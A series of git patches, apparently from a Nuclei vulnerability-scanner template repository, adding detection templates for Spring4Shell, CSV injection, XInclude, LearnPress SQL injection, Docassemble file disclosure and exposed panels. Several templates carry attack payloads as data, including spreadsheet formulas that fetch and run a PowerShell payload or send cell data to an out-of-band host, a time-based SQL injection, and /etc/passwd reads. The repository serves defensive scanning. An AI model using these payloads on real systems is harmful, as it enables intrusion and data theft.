workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 15463425f6d21cd145fdf250b6a3889bba40a234 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 08:21:22 +0000 Subject: [PATCH 0772/1841] Auto Template Signing [Mon Jul 1 08:21:22 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5522.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml index 5f7cc0286f..092be7e542 100644 --- a/http/cves/2024/CVE-2024-5522.yaml +++ b/http/cves/2024/CVE-2024-5522.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 425160439c0197ca29282926e1eebe5a0dd518d7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 08:22:09 +0000 Subject: [PATCH 0773/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index edc1a08a08..595ecbdece 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2024/CVE-2024-6028.yaml' - 'http/default-logins/apache/apache-apollo-default-login.yaml' - 'http/default-logins/caprover/caprover-default-login.yaml' + - 'http/default-logins/dialogic/dialogic-xms-default-login.yaml' - 'http/default-logins/jeedom/jeedom-default-login.yaml' - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposed-panels/dialogic-xms-console.yaml' From 704c1aa4b7e33ec5f391acd044818f82ce554f97 Mon Sep 17 00:00:00 2001 From: Hiroki Matsue <1086548+Matsue@users.noreply.github.com> Date: Mon, 1 Jul 2024 17:23:52 +0900 Subject: [PATCH 0774/1841] Update severity of polyfill-backdoor to high --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index bc5da88601..e65efaee93 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -3,7 +3,7 @@ id: polyfill-backdoor info: name: Polyfill.io - Detection author: kazet - severity: low + severity: high description: | The polyfill.io CDN was suspected to serve malware. reference: From 8a2b15cac3ee83624e805acd21518bdd86cfa192 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 13:54:28 +0530 Subject: [PATCH 0775/1841] Update CVE-2024-29972.yaml --- http/cves/2024/CVE-2024-29972.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-29972.yaml b/http/cves/2024/CVE-2024-29972.yaml index 2a3009874b..f48a6db96e 100644 --- a/http/cves/2024/CVE-2024-29972.yaml +++ b/http/cves/2024/CVE-2024-29972.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.88 cve-id: CVE-2024-29972 cwe-id: CWE-78 - epss-score: 0.90000 + epss-score: 0.9 epss-percentile: 0.3869 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: From 1fcb946e3f19b3f84ca5849f1a85e8980102204a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Jul 2024 15:46:18 +0530 Subject: [PATCH 0776/1841] duplicate path --- http/exposures/backups/sql-server-dump.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/backups/sql-server-dump.yaml b/http/exposures/backups/sql-server-dump.yaml index c8aa049b36..6295f4c4cb 100644 --- a/http/exposures/backups/sql-server-dump.yaml +++ b/http/exposures/backups/sql-server-dump.yaml @@ -17,9 +17,9 @@ http: - method: GET path: - "{{BaseURL}}{{paths}}" + payloads: paths: - - "/1.bak" - "/sa.bak" - "/wwwroot.bak" - "/backup.bak" From 081d0199342f2837cbb1fa2616dc034829a2d0a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 16:24:51 +0530 Subject: [PATCH 0777/1841] minor update --- http/cves/2024/CVE-2024-4434.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index 09c62cdc19..216190c993 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -22,6 +22,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/learnpress" tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress + variables: num: "{{rand_int(10000, 99999)}}" @@ -32,7 +33,7 @@ http: Host: {{Hostname}} - | - @timeout 30sn + @timeout 20s POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1 Host: {{Hostname}} X-WP-Nonce: {{nonce}} @@ -42,7 +43,8 @@ http: - type: dsl dsl: - 'duration_2 >= 6' - - 'contains(body_2,"status":"success")' + - 'contains_all(body_2,"status","success")' + - 'contains(content_type,"application/json")' - 'status_code_2 == 200' condition: and From 5bbd4d076fdb8dcb2a328b807575777112277b08 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 16:53:09 +0530 Subject: [PATCH 0778/1841] Create CVE-2022-22965.yaml --- dast/cves/2022/CVE-2022-22965.yaml | 57 ++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 dast/cves/2022/CVE-2022-22965.yaml diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/CVE-2022-22965.yaml new file mode 100644 index 0000000000..8dd74e2a66 --- /dev/null +++ b/dast/cves/2022/CVE-2022-22965.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-22965 + +info: + name: Spring Framework RCE via Data Binding on JDK 9+ + author: DhiyaneshDK,ritikchaddha + severity: critical + description: | + A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. + reference: + - https://spring.io/security/cve-2022-22965 + - https://pentest-tools.com/blog/detect-exploit-spring4shell-cve-2022-22965 + - http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005 + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22965 + cwe-id: CWE-94 + epss-score: 0.97483 + epss-percentile: 0.99971 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: spring_framework + tags: packetstorm,cve,cve2024,dast,spring,rce,kev + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + nix_fuzz: + - 'class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{nix_fuzz}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: Java" + case-insensitive: true From 85e9be0984f366cf9665f60278b7b4f78c9b11ff Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Jul 2024 17:27:02 +0530 Subject: [PATCH 0779/1841] Update and rename CVE-2022-22965.yaml to spring4shell-CVE-2022-22965.yaml --- .../{CVE-2022-22965.yaml => spring4shell-CVE-2022-22965.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename dast/cves/2022/{CVE-2022-22965.yaml => spring4shell-CVE-2022-22965.yaml} (98%) diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/spring4shell-CVE-2022-22965.yaml similarity index 98% rename from dast/cves/2022/CVE-2022-22965.yaml rename to dast/cves/2022/spring4shell-CVE-2022-22965.yaml index 8dd74e2a66..5996d07c42 100644 --- a/dast/cves/2022/CVE-2022-22965.yaml +++ b/dast/cves/2022/spring4shell-CVE-2022-22965.yaml @@ -1,4 +1,4 @@ -id: CVE-2022-22965 +id: spring4shell-CVE-2022-22965 info: name: Spring Framework RCE via Data Binding on JDK 9+ From a19f7f1a96f6ee09229cbc0794865976339a62e3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 17:29:30 +0530 Subject: [PATCH 0780/1841] Create csv-injection.yaml --- dast/vulnerabilities/csv-injection.yaml | 50 +++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 dast/vulnerabilities/csv-injection.yaml diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml new file mode 100644 index 0000000000..f81f152197 --- /dev/null +++ b/dast/vulnerabilities/csv-injection.yaml @@ -0,0 +1,50 @@ +id: csv-injection + +info: + name: CSV Injection Detection + author: DhiyaneshDK,ritikchaddha + severity: medium + description: | + A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications. + tags: dast,csv,oast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + csv_fuzz: + - 'class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}' + - 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0' + - '@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0' + - '=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0' + - '=cmd|' /C nslookup{{interactsh-url}}'!'A1'' + - '=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0' + - '=cmd|'/c rundll32.exe \\{{interactsh-url}}\3\2\1.dll,0'!_xlbgnm.A1' + - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' + - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' + - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' + - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{csv_fuzz}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: header + words: + - "text/csv" + - "application/csv" + - "application/vnd.ms-excel" From f3f929a3c28bcd14d8d3ce6440d840bbe00ce871 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 17:35:37 +0530 Subject: [PATCH 0781/1841] Create csv-injection.yaml --- dast/vulnerabilities/csv-injection.yaml | 44 +++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 dast/vulnerabilities/csv-injection.yaml diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml new file mode 100644 index 0000000000..056ac464c5 --- /dev/null +++ b/dast/vulnerabilities/csv-injection.yaml @@ -0,0 +1,44 @@ +id: csv-injection + +info: + name: XInclude Injection Detection + author: DhiyaneshDK,ritikchaddha + severity: high + description: | + XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. + reference: + - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks + tags: dast,xxe,xinclude + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xinc_fuzz: + - '' + - '' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{xinc_fuzz}}' + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' From b8f580fb6795b37d130d30150266598404451fcf Mon Sep 17 00:00:00 2001 From: johnk3r Date: Mon, 1 Jul 2024 12:24:38 -0300 Subject: [PATCH 0782/1841] Create CVE-2024-27292.yaml --- http/cves/2024/CVE-2024-27292.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27292.yaml diff --git a/http/cves/2024/CVE-2024-27292.yaml b/http/cves/2024/CVE-2024-27292.yaml new file mode 100644 index 0000000000..4f87baa0e4 --- /dev/null +++ b/http/cves/2024/CVE-2024-27292.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-27292 + +info: + name: Sensitive File Disclosure via Interview Endpoint + author: johnk3r + severity: high + description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. + reference: + - https://tantosec.com/blog/docassemble/ + - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv + tags: lfi,docassemble,cve,cve2024 + +requests: + - method: GET + path: + - "{{BaseURL}}/interview?i=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "nobody:[x*]:65534:65534" + - "root:.*:0:0:" + condition: or + + - type: status + status: + - 501 From a3b2a8875926eace56e415580538e41ae3b25bbf Mon Sep 17 00:00:00 2001 From: johnk3r Date: Mon, 1 Jul 2024 12:29:02 -0300 Subject: [PATCH 0783/1841] Update CVE-2024-27292.yaml --- http/cves/2024/CVE-2024-27292.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-27292.yaml b/http/cves/2024/CVE-2024-27292.yaml index 4f87baa0e4..753dd5c142 100644 --- a/http/cves/2024/CVE-2024-27292.yaml +++ b/http/cves/2024/CVE-2024-27292.yaml @@ -1,13 +1,19 @@ id: CVE-2024-27292 info: - name: Sensitive File Disclosure via Interview Endpoint + name: CVE-2024-27292 author: johnk3r severity: high description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. reference: - https://tantosec.com/blog/docassemble/ - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"docassemble" + fofa-query: + - icon_hash="-575790689" tags: lfi,docassemble,cve,cve2024 requests: From 8a005b258f5e4ff61c8a742295402c5720dbbe6e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Jul 2024 23:01:39 +0530 Subject: [PATCH 0784/1841] Create endpoint-protector-panel.yaml --- .../endpoint-protector-panel.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/exposed-panels/endpoint-protector-panel.yaml diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml new file mode 100644 index 0000000000..404873b41f --- /dev/null +++ b/http/exposed-panels/endpoint-protector-panel.yaml @@ -0,0 +1,28 @@ +id: endpoint-protector-panel + +info: + name: Endpoint Protector Login Panel - Detect + author: pussycat0x + severity: info + description: | + Endpoint Protector - Reporting and Administration Tool login panel was detected. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Endpoint Protector" + tags: panel,endpoint,login,detect,endpoint-protector + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Endpoint Protector - Reporting and Administration Tool" + + - type: status + status: + - 200 From 339c7d9b8e91f3871d81f0d07a8ef34a684999cd Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 17:33:24 +0000 Subject: [PATCH 0785/1841] Auto Generated New Template Addition List [Mon Jul 1 17:33:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 13881f7852..14919b7faa 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/misconfiguration/forgejo-repo-exposure.yaml http/misconfiguration/installer/kodbox-installer.yaml http/misconfiguration/installer/piwigo-installer.yaml http/misconfiguration/installer/poste-io-installer.yaml +http/misconfiguration/seq-dashboard-unath.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml From 3402fa074e0178220a4ba80f1083e3c5e7424708 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 17:33:30 +0000 Subject: [PATCH 0786/1841] Auto Generated Templates Checksum [Mon Jul 1 17:33:30 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index da942806e7..74d852fa99 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3466,7 +3466,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c -http/cves/2024/CVE-2024-5522.yaml:2c28dad17650907937ec00e854a67c4b7f6fc7da +http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -5869,6 +5869,7 @@ http/misconfiguration/secnet-info-leak.yaml:5f2028c717a06972b7c79f8651397eed3cbd http/misconfiguration/seeyon-unauth.yaml:327e4ce46015f481855c8a2f2f6d26b80a2f9109 http/misconfiguration/selenium-exposure.yaml:1fb605206740b5a7ec01d6ba7468b4339d8f34e9 http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f43ec4db9ec22 +http/misconfiguration/seq-dashboard-unath.yaml:b3621cee00d9c3cd50ccb6173b4c2b6a9f367c12 http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b @@ -8814,7 +8815,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb9850043f870569f04715c8bb1a351278584bc3 +templates-checksum.txt:136c12ba3e0399c67c6304103c42a0313dc50597 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7cfaf2ce32b24eb89d613b9eb4ce385e02245475 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 17:34:17 +0000 Subject: [PATCH 0787/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 595ecbdece..821feca037 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/misconfiguration/installer/kodbox-installer.yaml' - 'http/misconfiguration/installer/piwigo-installer.yaml' - 'http/misconfiguration/installer/poste-io-installer.yaml' + - 'http/misconfiguration/seq-dashboard-unath.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' From 71e89d62f2161343711e64db42b8b413797a864a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 17:35:10 +0000 Subject: [PATCH 0788/1841] Auto Template Signing [Mon Jul 1 17:35:10 UTC 2024] :robot: --- http/default-logins/dialogic/dialogic-xms-default-login.yaml | 1 + http/misconfiguration/seq-dashboard-unath.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/dialogic/dialogic-xms-default-login.yaml b/http/default-logins/dialogic/dialogic-xms-default-login.yaml index 3fd04e7789..4b4eb72d3d 100644 --- a/http/default-logins/dialogic/dialogic-xms-default-login.yaml +++ b/http/default-logins/dialogic/dialogic-xms-default-login.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022100bb438b77aab69bf23ecaff901d2ae764492c3198dd258f86807c090d548a7f79021f762e3ac6e41662c24d0986e227981aa1621ba654bcf0a95b88be934e4a15ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/seq-dashboard-unath.yaml b/http/misconfiguration/seq-dashboard-unath.yaml index 0ffa84adec..5bc895cab5 100644 --- a/http/misconfiguration/seq-dashboard-unath.yaml +++ b/http/misconfiguration/seq-dashboard-unath.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c7ab34a8c3cc7a822e231234bf9219a7871da15512d3e1b36aae8280a84d3bc1022054c06ec0a44dfe3fcef3cc55d8261b322c83508974596a08cc762802410aeaa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4fe8aa8e5bfbdfe2ff57afbf24b687f342b6b53d Mon Sep 17 00:00:00 2001 From: button value=11 Date: Mon, 1 Jul 2024 19:14:26 -0300 Subject: [PATCH 0789/1841] Update aws-cognito.yaml Optimizing the Regular Expression for Efficiency --- file/keys/amazon/aws-cognito.yaml | 21 ++------------------- 1 file changed, 2 insertions(+), 19 deletions(-) diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml index a077fb70c5..80ab71d209 100644 --- a/file/keys/amazon/aws-cognito.yaml +++ b/file/keys/amazon/aws-cognito.yaml @@ -2,7 +2,7 @@ id: aws-cognito-pool info: name: Amazon Web Services Cognito Pool ID - Detect - author: gaurang + author: gaurang, zeroc00i severity: info description: Amazon Web Services Cognito Pool ID token was detected. classification: @@ -18,21 +18,4 @@ file: extractors: - type: regex regex: - - "ap-northeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-northeast-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-south-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-north-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" -# digest: 4a0a0047304502210090ee38d9121141c817986346c8a6e0c5910ee05a6cef57dc63ca444a691e292902203a724d1adda15bb0aa60207d79057c6cf7dc3c84bc929f9bf50b34f314fef15d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "(ap|ca|eu|sa|us)-(east|southeast|south|west|north|central)-[0-9]:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9a-z]{12}" From 998c33154c4344d62ccd1232912ba87fd9c91905 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 00:19:36 +0000 Subject: [PATCH 0790/1841] Auto WordPress Plugins Update [Tue Jul 2 00:19:36 UTC 2024] :robot: --- helpers/wordpress/plugins/chaty.txt | 2 +- helpers/wordpress/plugins/contact-form-7-honeypot.txt | 2 +- helpers/wordpress/plugins/ga-google-analytics.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/ninja-forms.txt | 2 +- helpers/wordpress/plugins/optinmonster.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/woocommerce-paypal-payments.txt | 2 +- helpers/wordpress/plugins/wpvivid-backuprestore.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 3 +-- http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - 